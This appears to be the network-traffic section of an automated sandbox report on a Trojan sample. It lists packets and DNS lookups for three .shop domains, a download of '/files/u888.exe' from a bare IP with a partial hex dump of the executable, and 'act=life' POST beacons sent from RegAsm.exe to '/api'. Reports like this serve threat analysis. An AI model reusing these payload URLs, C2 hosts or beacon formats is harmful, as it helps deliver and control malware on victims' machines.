          Aug 28, 2024 15:29:03.092298031 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.092318058 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.092341900 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.092422962 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.092498064 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.092508078 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.092535019 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.092742920 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.092782974 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.092811108 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.092873096 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.092911959 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.092952967 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.092963934 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.092974901 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.093014002 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.093080997 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.093094110 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.093117952 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.093198061 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.093208075 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.093224049 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.093233109 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.093240976 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.093271017 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.093353987 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.093367100 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.093378067 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.093389988 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.093394995 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.093436956 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.093493938 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.093539000 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.093549013 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.093594074 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.097893953 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.097999096 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.098009109 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.098017931 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.098031998 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.098042965 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.098043919 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.098059893 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.098094940 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.098124027 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.098136902 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.098172903 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.098237991 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.098287106 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.098299026 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.098308086 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.098324060 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.098453045 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.098464012 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.098473072 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.098484039 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.098501921 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.098532915 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.098536015 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.098701954 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.098747015 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.098861933 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.098984957 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.099001884 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.099034071 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.099037886 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.099050045 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.099060059 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.099081039 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.099106073 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.099252939 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.099265099 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.099304914 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.100311995 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.100370884 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.100382090 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.100413084 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.100474119 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.100505114 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.100517035 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.100522041 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.100528002 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.100548983 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.100593090 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.100634098 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.100692034 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.100703001 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.100713015 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.100723982 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.100734949 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.100739956 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.100747108 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.100769043 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.100797892 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.100862026 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.100873947 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.100922108 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.100997925 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.101044893 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.101056099 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.101092100 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.101155996 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.101167917 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.101177931 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.101191044 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.101200104 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.101227045 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.101277113 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.101289034 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.101300001 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.101310015 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.101321936 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.101347923 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.101623058 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.101667881 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.101667881 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.101680040 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.101720095 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.101856947 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.101867914 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.101877928 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.101890087 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.101901054 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.101928949 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.102010965 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.153951883 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.416830063 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.808367014 CEST49703443192.168.2.7188.114.96.3
          Aug 28, 2024 15:29:03.808406115 CEST44349703188.114.96.3192.168.2.7
          Aug 28, 2024 15:29:03.808470964 CEST49703443192.168.2.7188.114.96.3
          Aug 28, 2024 15:29:03.813328981 CEST49703443192.168.2.7188.114.96.3
          Aug 28, 2024 15:29:03.813343048 CEST44349703188.114.96.3192.168.2.7
          Aug 28, 2024 15:29:04.443402052 CEST44349703188.114.96.3192.168.2.7
          Aug 28, 2024 15:29:04.443507910 CEST49703443192.168.2.7188.114.96.3
          Aug 28, 2024 15:29:04.447348118 CEST49703443192.168.2.7188.114.96.3
          Aug 28, 2024 15:29:04.447360039 CEST44349703188.114.96.3192.168.2.7
          Aug 28, 2024 15:29:04.447597980 CEST44349703188.114.96.3192.168.2.7
          Aug 28, 2024 15:29:04.495445013 CEST49703443192.168.2.7188.114.96.3
          Aug 28, 2024 15:29:04.495445013 CEST49703443192.168.2.7188.114.96.3
          Aug 28, 2024 15:29:04.495559931 CEST44349703188.114.96.3192.168.2.7
          Aug 28, 2024 15:29:05.247525930 CEST44349703188.114.96.3192.168.2.7
          Aug 28, 2024 15:29:05.247627974 CEST44349703188.114.96.3192.168.2.7
          Aug 28, 2024 15:29:05.247704983 CEST49703443192.168.2.7188.114.96.3
          Aug 28, 2024 15:29:05.249464035 CEST49703443192.168.2.7188.114.96.3
          Aug 28, 2024 15:29:05.249484062 CEST44349703188.114.96.3192.168.2.7
          Aug 28, 2024 15:29:05.267122030 CEST49704443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:05.267162085 CEST44349704188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:05.267236948 CEST49704443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:05.269263029 CEST49704443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:05.269277096 CEST44349704188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:05.751277924 CEST44349704188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:05.751379967 CEST49704443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:05.777362108 CEST49704443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:05.777409077 CEST44349704188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:05.777645111 CEST44349704188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:05.779382944 CEST49704443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:05.779403925 CEST49704443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:05.779453039 CEST44349704188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:06.199810982 CEST44349704188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:06.199902058 CEST44349704188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:06.199956894 CEST49704443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:06.200746059 CEST49704443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:06.200769901 CEST44349704188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:06.200783968 CEST49704443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:06.200790882 CEST44349704188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:06.493125916 CEST49705443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:06.493155956 CEST44349705188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:06.493208885 CEST49705443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:06.493781090 CEST49705443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:06.493794918 CEST44349705188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:06.967137098 CEST44349705188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:06.967216015 CEST49705443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:06.969063044 CEST49705443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:06.969080925 CEST44349705188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:06.969417095 CEST44349705188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:06.970669985 CEST49705443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:06.970694065 CEST49705443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:06.970755100 CEST44349705188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:07.105823994 CEST44349705188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:07.105904102 CEST44349705188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:07.105956078 CEST44349705188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:07.105979919 CEST49705443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:07.105998993 CEST44349705188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:07.106072903 CEST49705443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:07.111057043 CEST44349705188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:07.111151934 CEST44349705188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:07.111213923 CEST49705443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:07.119072914 CEST49705443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:07.119086981 CEST44349705188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:07.119097948 CEST49705443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:07.119102955 CEST44349705188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:07.186758995 CEST49707443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:07.186798096 CEST44349707188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:07.186856031 CEST49707443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:07.187216997 CEST49707443192.168.2.7188.114.97.3
          Aug 28, 2024 15:29:07.187232018 CEST44349707188.114.97.3192.168.2.7
          Aug 28, 2024 15:29:07.638514996 CEST49707443192.168.2.7188.114.97.3

          UDP Packets

          TimestampSource PortDest PortSource IPDest IP
          Aug 28, 2024 15:29:03.784058094 CEST5726753192.168.2.71.1.1.1
          Aug 28, 2024 15:29:03.798139095 CEST53572671.1.1.1192.168.2.7
          Aug 28, 2024 15:29:05.253081083 CEST6441853192.168.2.71.1.1.1
          Aug 28, 2024 15:29:05.265813112 CEST53644181.1.1.1192.168.2.7
          Aug 28, 2024 15:29:06.451728106 CEST5034753192.168.2.71.1.1.1
          Aug 28, 2024 15:29:06.464340925 CEST53503471.1.1.1192.168.2.7

          DNS Queries

          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Aug 28, 2024 15:29:03.784058094 CEST192.168.2.71.1.1.10x7764Standard query (0)miracledzmnqwui.shopA (IP address)IN (0x0001)false
          Aug 28, 2024 15:29:05.253081083 CEST192.168.2.71.1.1.10xc8f9Standard query (0)locatedblsoqp.shopA (IP address)IN (0x0001)false
          Aug 28, 2024 15:29:06.451728106 CEST192.168.2.71.1.1.10x3ffdStandard query (0)traineiwnqo.shopA (IP address)IN (0x0001)false

          DNS Answers

          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Aug 28, 2024 15:29:03.798139095 CEST1.1.1.1192.168.2.70x7764No error (0)miracledzmnqwui.shop188.114.96.3A (IP address)IN (0x0001)false
          Aug 28, 2024 15:29:03.798139095 CEST1.1.1.1192.168.2.70x7764No error (0)miracledzmnqwui.shop188.114.97.3A (IP address)IN (0x0001)false
          Aug 28, 2024 15:29:05.265813112 CEST1.1.1.1192.168.2.70xc8f9No error (0)locatedblsoqp.shop188.114.97.3A (IP address)IN (0x0001)false
          Aug 28, 2024 15:29:05.265813112 CEST1.1.1.1192.168.2.70xc8f9No error (0)locatedblsoqp.shop188.114.96.3A (IP address)IN (0x0001)false
          Aug 28, 2024 15:29:06.464340925 CEST1.1.1.1192.168.2.70x3ffdNo error (0)traineiwnqo.shop188.114.97.3A (IP address)IN (0x0001)false
          Aug 28, 2024 15:29:06.464340925 CEST1.1.1.1192.168.2.70x3ffdNo error (0)traineiwnqo.shop188.114.96.3A (IP address)IN (0x0001)false

          HTTP Request Dependency Graph

          • miracledzmnqwui.shop
          • locatedblsoqp.shop
          • traineiwnqo.shop
          • 147.45.44.131

          HTTP Packets

          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.749702147.45.44.131806612C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
          TimestampBytes transferredDirectionData
          Aug 28, 2024 15:29:02.064625025 CEST77OUTGET /files/u888.exe HTTP/1.1
          Host: 147.45.44.131
          Connection: Keep-Alive
          Aug 28, 2024 15:29:02.716989040 CEST1236INHTTP/1.1 200 OK
          Date: Wed, 28 Aug 2024 13:29:02 GMT
          Server: Apache/2.4.52 (Ubuntu)
          Last-Modified: Tue, 27 Aug 2024 16:37:44 GMT
          ETag: "43000-620acdc619d20"
          Accept-Ranges: bytes
          Content-Length: 274432
          Keep-Alive: timeout=5, max=100
          Connection: Keep-Alive
          Content-Type: application/x-msdos-program
          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 b3 ec cc 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 03 00 00 c6 00 00 00 00 00 00 30 99 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 04 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 29 a4 03 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 04 00 40 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c a5 [TRUNCATED]
          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELff0@@)x@BL.textdf `.rdataU(*j@@.data\X@.reloc@BD@B
          Aug 28, 2024 15:29:02.717014074 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Data Ascii: USWV<$T$PFFFFFF1=D$C11$CD$0_QYWD$4[UEKD$8GIAOD$<CMCD$@FG
          Aug 28, 2024 15:29:02.717026949 CEST1236INData Raw: 24 bc 01 00 00 62 60 6f 6d c7 84 24 c0 01 00 00 6e 69 6e 6b c7 84 24 c4 01 00 00 68 69 16 13 c7 84 24 c8 01 00 00 10 11 24 12 c7 84 24 cc 01 00 00 1e 1f 10 1a c7 84 24 d0 01 00 00 12 19 1e 17 c7 84 24 d4 01 00 00 1c 2d 02 3b c7 84 24 d8 01 00 00
          Data Ascii: $b`om$nink$hi$$$$$-;$!/$$$A1$6g$4d:l$8g&`$<}"b$ je$'%($(m-/$i.$$$$
          Aug 28, 2024 15:29:02.717066050 CEST672INData Raw: 8b 4c 24 10 0f b7 1c 39 8b 3d e0 b5 43 00 90 90 90 90 90 90 90 90 90 90 ff e7 8a 66 07 31 c9 84 e4 0f 95 c1 89 5c 24 08 88 fa 89 54 24 18 89 4c 24 10 ff 24 8d e4 b5 43 00 8b 4c 24 04 0f b6 b9 e0 08 44 00 31 db 8b 4c 24 14 8b 54 24 20 84 8c 3a e0
          Data Ascii: L$9=Cf1\$T$L$$CL$D1L$T$ :D$C%C00n%CT$$CD$\$$CL$C~L$^L$N
          Aug 28, 2024 15:29:02.717077971 CEST1236INData Raw: da 8b 5c 24 0c 8b 4c 24 1c 0f b6 94 11 a8 08 44 00 0f b6 4c 24 03 d3 e2 c0 ea 07 0f b6 d2 ff 24 95 3c b6 43 00 0f b6 54 24 14 89 54 24 18 c1 ea 03 83 e2 04 ff a2 44 b6 43 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ff 25 58 b6 43 00 31 d2 80 7c
          Data Ascii: \$L$DL$$<CT$T$DC%XC1|$$lC\$L$$tCQDC1D$ iDiD9$|C~L$$C1<"$C1<#$C$C1<!$CL$(01
          Aug 28, 2024 15:29:02.717088938 CEST1236INData Raw: 0f 31 db 80 fc 05 0f 94 c3 ff 24 9d 4c b8 43 00 0f b6 54 24 04 80 e2 01 0f b6 da ff 24 9d 64 b8 43 00 b3 04 4d 0f b6 d3 31 c9 80 fb 02 0f 92 c1 ff 24 8d 7c b8 43 00 31 c9 83 fa 01 0f 94 c1 89 d3 ff 24 8d 9c b8 43 00 83 cf 20 89 7e 18 0f b6 4d 00
          Data Ascii: 1$LCT$$dCM1$|C1$C ~MNL$C|$|$ $,CM1$|C1$C1$C~MNL$C1$CL
          Aug 28, 2024 15:29:02.717099905 CEST1236INData Raw: 04 55 68 33 a2 43 00 e8 84 6d 00 00 83 c4 0c 85 c0 0f 84 c4 02 00 00 6a 05 55 68 38 a2 43 00 e8 6c 6d 00 00 83 c4 0c 85 c0 0f 85 43 ff ff ff 83 c5 05 89 2e 6a 10 ff 15 5c b9 43 00 83 c4 04 31 c9 85 c0 0f 85 af 02 00 00 31 db e9 22 ff ff ff 8b 04
          Data Ascii: Uh3CmjUh8ClmC.j\C11"$$prfD$$Orfj\C@D$XjUhCl.j\C@
          Aug 28, 2024 15:29:02.717113972 CEST1236INData Raw: 50 89 d5 e8 84 67 00 00 83 c4 0c 8b 4d 04 eb 04 31 c9 89 d5 51 ff 15 58 b9 43 00 83 c4 04 8b 44 24 04 89 45 04 89 5d 0c 8b 45 00 89 07 8b 45 04 8b 4d 08 89 3c 88 ff 45 08 8b 2e 0f b6 7d 00 57 e8 07 69 00 00 83 c4 04 85 c0 74 29 45 90 90 90 90 90
          Data Ascii: PgM1QXCD$E]EEM<E.}Wit)E.}WhEuM<,u8E.]WhEu]tM.\$M1PhtE.]SzhEu]\$u&$tQWX
          Aug 28, 2024 15:29:02.717263937 CEST1236INData Raw: 90 c3 cc cc cc cc cc cc 53 57 56 8b 74 24 10 31 db 85 f6 74 2e 8b 7c 24 14 85 ff 74 26 57 e8 a5 63 00 00 83 c4 04 89 f1 89 fa 50 e8 58 fc ff ff 83 c4 04 85 c0 74 0c 8b 4c 24 18 31 db 39 48 04 0f 94 c3 89 d8 5e 5f 5b c3 cc cc cc cc cc cc cc cc cc
          Data Ascii: SWVt$1t.|$t&WcPXtL$19H^_[L$1tT$9QvAD$t@1L$1tT$9QvItyuAWVD$Hp~t.1
          Aug 28, 2024 15:29:02.717278004 CEST1236INData Raw: 53 ff 15 5c b9 43 00 83 c4 04 89 04 24 89 44 24 20 53 ff 15 5c b9 43 00 83 c4 04 89 c3 89 44 24 14 85 f6 0f 84 93 00 00 00 83 7c 24 08 00 0f 84 88 00 00 00 83 7c 24 04 00 0f 84 7d 00 00 00 83 3c 24 00 74 77 85 db 74 73 90 90 90 90 90 90 90 90 90
          Data Ascii: S\C$D$ S\CD$|$|$}<$twtsFFFFFFF utMu|$0tK7IVXCt$XCt$XC4$XCSXC
          Aug 28, 2024 15:29:02.721970081 CEST1236INData Raw: 0e 01 00 00 0f be 41 02 85 c0 0f 84 02 01 00 00 0f be 69 03 85 ed 0f 84 f6 00 00 00 89 d9 80 c1 d0 80 f9 09 77 05 83 c3 d0 eb 23 89 d9 80 c1 9f 80 f9 05 77 05 83 c3 a9 eb 14 89 d9 80 c1 bf 80 f9 06 72 07 bb ff ff ff ff eb 03 83 c3 c9 89 d1 80 c1
          Data Ascii: Aiw#wrw#wrw#wrw#wrt%t


          HTTPS Proxied Packets

          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.749703188.114.96.3443320C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          TimestampBytes transferredDirectionData
          2024-08-28 13:29:04 UTC267OUTPOST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: miracledzmnqwui.shop
          2024-08-28 13:29:04 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
          Data Ascii: act=life
          2024-08-28 13:29:05 UTC814INHTTP/1.1 200 OK
          Date: Wed, 28 Aug 2024 13:29:05 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Set-Cookie: PHPSESSID=3lklc31d910s7hhmnv5u0r03fl; expires=Sun, 22-Dec-2024 07:15:44 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UyBUlKY8%2BA0hqBZ78EuF8pdqwEimVCQYowfNNoNS8pUJq%2F1HS8xO1Ze9DZ%2BdXcfHXFM6zeURzAGEYeI3Iaauea7Gw9PzAjtjNjJhrn%2FRcUHHc4jiG67g%2FwleGs2dA0X%2F3mN72HPItA%3D%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8ba4a5ed2eb2c327-EWR
          alt-svc: h3=":443"; ma=86400
          2024-08-28 13:29:05 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
          Data Ascii: aerror #D12
          2024-08-28 13:29:05 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.749704188.114.97.3443320C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          TimestampBytes transferredDirectionData
          2024-08-28 13:29:05 UTC265OUTPOST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: locatedblsoqp.shop
          2024-08-28 13:29:05 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
          Data Ascii: act=life
          2024-08-28 13:29:06 UTC804INHTTP/1.1 200 OK
          Date: Wed, 28 Aug 2024 13:29:06 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
